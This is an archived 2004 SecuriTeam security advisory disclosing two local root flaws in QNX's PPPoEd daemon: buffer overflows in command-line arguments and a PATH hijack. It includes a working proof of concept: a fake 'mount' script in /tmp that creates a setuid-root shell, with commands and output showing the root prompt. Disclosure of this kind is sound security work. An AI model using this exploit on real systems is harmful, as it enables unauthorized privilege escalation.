[UNIX] QNX PPPoEd Local Root Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 09/06/04

  • Next message: SecuriTeam: "[NT] WinZip Multiple Buffer Overflows"
    To: list@securiteam.com
    Date: 6 Sep 2004 11:44:03 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      QNX PPPoEd Local Root Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

     
    <http://www.qnx.com/developers/docs/momentics621_docs/neutrino/utilities/p/pppoed.html> PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX users.

    Two vulnerabilities that can lead to root compromise have been found in
    QNX's PPPoE daemon.

    DETAILS

    Vulnerable Systems:
     * QNX RTP version 6.1

    The PPPoE daemon, when launched, can receive command line arguments. It
    seems that there is hardly any bounds checking present when processing
    arguments. Once it is by default suid owned by root, an attacker can
    execute arbitrary instructions to elevate privileges. An example follows:
    $ export overflow256='AAAAAAAAAAAAAAA(...)' (around 256 A's)
    $ /usr/bin/pppoed -F $overflow256
    Memory fault (core dumped)
    $ /usr/bin/pppoed service=$overflow256
    Memory fault (core dumped)
    ..

    The same vulnerability also occurs when processing the following
    arguments: 'name', 'en', 'upscript', 'downscript', 'retries', 'timeout',
    'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac'.

    The second issue with PPPoEd is that it is possible to execute commands by
    tricking PPPoEd. This can be done by altering the $PATH environment
    variable since PPPoEd does not mount with a proper absolute path. It
    attempts to execute 'mount -T io-net npm-pppoe.so'. When altering $PATH,
    '/usr/sbin/pppoed' will simply execute 'mount' (hostile code) looking for
    it at the /tmp directory. An example is in order:
    $ cd /tmp
    $ cat mount
    #!/bin/sh
    cp /bin/sh /tmp/rootshell
    chown root /tmp/rootshell
    chmod 4777 /tmp/rootshell
    echo "Here comes your root shell"
    _EOF_

    And actually running PPPoE:
    $ chmod 755 mount
    $ export PATH=/tmp:$PATH
    $ /usr/sbin/pppoed
    $ ls -la /tmp
    -rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
    -rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
    $ /tmp/rootshell
    Here comes your root shell
    # uname -a
    QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86
    #

    Disclosure Timeline
    27 Aug 2004 Vulnerabilities detected;
    28 Aug - 01 Sep Looking for QNX security staff contact e-mail: no
    success;
    02 Sep 2004 Advisory written and sent to security mail-lists.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:julio@rfdslabs.br> Julio
    Cesar Fort.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] WinZip Multiple Buffer Overflows"

    Relevant Pages

    • [UNIX] Trend Micro VirusWall Buffer Overflow in VSAPI Library
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... buffer overflow vulnerability in VSAPI library allows arbitrary code ... is called "vscan" which is set suid root by default. ... permissions and thus granted all local users the privilege to execute the ...
      (Securiteam)
    • [UNIX] Rocks Clusters Local Root Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Rocks Clusters Local Root Vulnerabilities ... Rocks Clusters is vulnerable to local root privilege escalation due to ... systemexecution. ...
      (Securiteam)
    • [UNIX] Oracle Database Local Untrusted Library Path Vulnerability (Technical Details)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Oracle Database Local Untrusted Library Path Vulnerability (Technical ... allows a user in the OINSTALL/DBA group to scalate privileges to root. ...
      (Securiteam)
    • [UNIX] KPopup Allows Gaining of Elevated Privileges (Insecure system())
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... compiled and install the binary KPopup is installed setuid root it also ... especially on a setuid root binaries. ... To exploit this we need to do is make a shell script and call it killall, ...
      (Securiteam)
    • [UNIX] Sun Microsystems Solaris ld.so Directory Traversal Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Sun Microsystems Solaris ld.so Directory Traversal Vulnerability ... potentially allow a non root user to execute arbitrary code as root. ... This message file is meant to contain format strings used to build error ...
      (Securiteam)